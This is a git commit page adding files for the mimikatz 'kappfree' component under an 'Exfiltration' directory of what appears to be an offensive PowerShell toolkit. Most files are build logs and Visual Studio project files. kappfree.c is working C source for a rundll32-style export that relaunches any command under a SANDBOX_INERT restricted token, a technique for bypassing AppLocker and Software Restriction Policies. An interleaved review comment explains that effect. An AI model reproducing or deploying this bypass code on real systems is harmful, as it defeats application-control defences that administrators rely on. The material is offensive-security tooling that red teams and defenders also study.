author | clymb3r <bialek.joseph@gmail.com> | 2013-10-01 09:47:05 -0700 |
---|---|---|
committer | clymb3r <bialek.joseph@gmail.com> | 2013-10-01 09:47:05 -0700 |
commit | 59cd18360764af6e6133ad11ec9cd8295372e587 (patch) | |
tree | 758a4f12cd6d2bddb0006df7d1fcac3736b61b8f /Exfiltration/mimikatz-1.0/kappfree | |
parent | b17272eb98933c62baa5a21bcd23713f9182ee38 (diff) | |
Adding Invoke-Mimikatz and Invoke-Ninjacopy
Diffstat (limited to 'Exfiltration/mimikatz-1.0/kappfree')
23 files changed, 193 insertions, 0 deletions
diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.read.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.read.1.tlog Binary files differnew file mode 100644 index 0000000..574462d --- /dev/null +++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.read.1.tlog diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.write.1.tlog Binary files differnew file mode 100644 index 0000000..1393f52 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.write.1.tlog diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/cl.command.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/cl.command.1.tlog Binary files differnew file mode 100644 index 0000000..05c99d0 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/cl.command.1.tlog diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.dll.intermediate.manifest b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.dll.intermediate.manifest new file mode 100644 index 0000000..ecea6f7 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.dll.intermediate.manifest @@ -0,0 +1,10 @@ +<?xml version='1.0' encoding='UTF-8' standalone='yes'?> +<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> + <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> + <security> + <requestedPrivileges> + <requestedExecutionLevel level='asInvoker' uiAccess='false' /> + </requestedPrivileges> + </security> + </trustInfo> +</assembly> diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.lastbuildstate b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.lastbuildstate new file mode 100644 index 0000000..4d28193 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.lastbuildstate @@ -0,0 +1,2 @@ +#v4.0:v100 +Release|Win32|C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\| 
diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.res b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.res Binary files differnew file mode 100644 index 0000000..416efb2 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.res diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.write.1.tlog new file mode 100644 index 0000000..352791c --- /dev/null +++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.write.1.tlog @@ -0,0 +1,5 @@ +^C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\kappfree\kappfree.vcxproj +C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kappfree.lib +C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kappfree.lib +C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kappfree.exp +C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kappfree.exp diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.read.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.read.1.tlog new file mode 100644 index 0000000..46b134b --- /dev/null +++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.read.1.tlog @@ -0,0 +1 @@ +ÿþ
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.write.1.tlog new file mode 100644 index 0000000..46b134b --- /dev/null +++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.write.1.tlog @@ -0,0 +1 @@ +ÿþ
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/link.command.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/link.command.1.tlog Binary files differnew file mode 100644 index 0000000..cdc5689 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/link.command.1.tlog diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/link.read.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/link.read.1.tlog Binary files differnew file mode 100644 index 0000000..b97e650 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/link.read.1.tlog diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/link.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/link.write.1.tlog Binary files differnew file mode 100644 index 0000000..f8b3fd9 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/link.write.1.tlog diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.command.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.command.1.tlog Binary files differnew file mode 100644 index 0000000..be34103 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.command.1.tlog diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.read.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.read.1.tlog Binary files differnew file mode 100644 index 0000000..23f6601 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.read.1.tlog diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.write.1.tlog Binary files differnew file mode 100644 index 0000000..53b60f3 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.write.1.tlog diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.command.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.command.1.tlog Binary files differnew file mode 100644 index 0000000..92ee084 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.command.1.tlog 
diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.read.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.read.1.tlog
Binary files differ
new file mode 100644
index 0000000..6f2e9b0
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.read.1.tlog
diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.write.1.tlog
Binary files differ
new file mode 100644
index 0000000..c18037c
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.write.1.tlog
diff --git a/Exfiltration/mimikatz-1.0/kappfree/kappfree.c b/Exfiltration/mimikatz-1.0/kappfree/kappfree.c
new file mode 100644
index 0000000..63130c9
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/kappfree.c
@@ -0,0 +1,34 @@
+/* Benjamin DELPY `gentilkiwi`
+ http://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#include "kappfree.h"
+
+extern __declspec(dllexport) void __cdecl startW(HWND hwnd, HINSTANCE hinst, LPWSTR lpszCmdLine, int nCmdShow)
+{
+ HANDLE monToken, monSuperToken;
+ wchar_t * commandLine;
+ PROCESS_INFORMATION mesInfosProcess;
+ STARTUPINFO mesInfosDemarrer;
+
+ if(OpenProcessToken(GetCurrentProcess(), TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY /*| TOKEN_IMPERSONATE*/, &monToken))
+ {
+ if(CreateRestrictedToken(monToken, SANDBOX_INERT, 0, NULL, 0, NULL, 0, NULL, &monSuperToken))
+ {
+ RtlZeroMemory(&mesInfosProcess, sizeof(PROCESS_INFORMATION));
+ RtlZeroMemory(&mesInfosDemarrer, sizeof(STARTUPINFO));
+ mesInfosDemarrer.cb = sizeof(STARTUPINFO);
+
+ commandLine = _wcsdup(lpszCmdLine);
+ if(CreateProcessAsUser(monSuperToken, NULL, commandLine, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &mesInfosDemarrer, &mesInfosProcess))
+ {
+ CloseHandle(mesInfosProcess.hThread);
+ CloseHandle(mesInfosProcess.hProcess);
+ }
+ free(commandLine);
+ CloseHandle(monSuperToken);
+ }
+ CloseHandle(monToken);
+ }
+}
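Review bot: Nothing in `startW` says why the duplicate token is built with `SANDBOX_INERT`, although that flag is the function's whole effect: the `CreateRestrictedToken` documentation describes it as telling the system not to check AppLocker rules or apply Software Restriction Policies for processes started with the token (I believe newer Windows releases honour it only for highly privileged callers, which should be confirmed for the versions in scope). A header comment along the lines of `/* Runs lpszCmdLine in a new console under a SANDBOX_INERT copy of the current process token; the signature matches the rundll32 entry-point convention. */` would make that visible to anyone auditing the tree or writing detections for it. The `_wcsdup` result also goes to `CreateProcessAsUser` unchecked, and with a NULL application name an unquoted path containing spaces is parsed ambiguously, so an `if(commandLine != NULL)` guard around the call and a documented requirement that the executable path be quoted are worth adding. Every failure path is silent because the export returns `void`; whether callers need an error signal cannot be judged from this hunk.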
diff --git a/Exfiltration/mimikatz-1.0/kappfree/kappfree.h b/Exfiltration/mimikatz-1.0/kappfree/kappfree.h
new file mode 100644
index 0000000..22ffbc2
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/kappfree.h
@@ -0,0 +1,9 @@
+/* Benjamin DELPY `gentilkiwi`
+ http://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include <windows.h>
+
+extern __declspec(dllexport) void __cdecl startW(HWND hwnd, HINSTANCE hinst, LPWSTR lpszCmdLine, int nCmdShow);
diff --git a/Exfiltration/mimikatz-1.0/kappfree/kappfree.rc b/Exfiltration/mimikatz-1.0/kappfree/kappfree.rc
Binary files differ
new file mode 100644
index 0000000..f08bc56
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/kappfree.rc
diff --git a/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj b/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj
new file mode 100644
index 0000000..ef29473
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj
@@ -0,0 +1,119 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{E7A85049-E31E-4575-B6A0-E6F1EAA9EEB0}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>kappfree</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + <UseOfMfc>Static</UseOfMfc> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + <UseOfMfc>Static</UseOfMfc> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import 
Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\</OutDir> + <IntDir>$(Platform)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\</OutDir> + <IntDir>$(Platform)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>Full</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KAPPFREE_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules</AdditionalIncludeDirectories> + <FavorSizeOrSpeed>Size</FavorSizeOrSpeed> + <StringPooling>true</StringPooling> + <ExceptionHandling>false</ExceptionHandling> + <FloatingPointModel>Fast</FloatingPointModel> + <FloatingPointExceptions>false</FloatingPointExceptions> + <CreateHotpatchableImage>false</CreateHotpatchableImage> + <ErrorReporting>None</ErrorReporting> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>false</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalDependencies>advapi32.lib;%(AdditionalDependencies)</AdditionalDependencies> + <LinkErrorReporting>NoErrorReport</LinkErrorReporting> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup 
Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>Full</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KAPPFREE_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules</AdditionalIncludeDirectories> + <FavorSizeOrSpeed>Size</FavorSizeOrSpeed> + <StringPooling>true</StringPooling> + <ExceptionHandling>false</ExceptionHandling> + <FloatingPointModel>Fast</FloatingPointModel> + <FloatingPointExceptions>false</FloatingPointExceptions> + <CreateHotpatchableImage>false</CreateHotpatchableImage> + <ErrorReporting>None</ErrorReporting> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>false</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalDependencies>advapi32.lib;%(AdditionalDependencies)</AdditionalDependencies> + <LinkErrorReporting>NoErrorReport</LinkErrorReporting> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="kappfree.c" /> + </ItemGroup> + <ItemGroup> + <ClInclude Include="kappfree.h" /> + </ItemGroup> + <ItemGroup> + <ResourceCompile Include="kappfree.rc" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project>
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj.filters b/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj.filters new file mode 100644 index 0000000..987362e --- /dev/null +++ b/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj.filters @@ -0,0 +1,12 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClInclude Include="kappfree.h" /> + </ItemGroup> + <ItemGroup> + <ResourceCompile Include="kappfree.rc" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="kappfree.c" /> + </ItemGroup> +</Project>
\ No newline at end of file |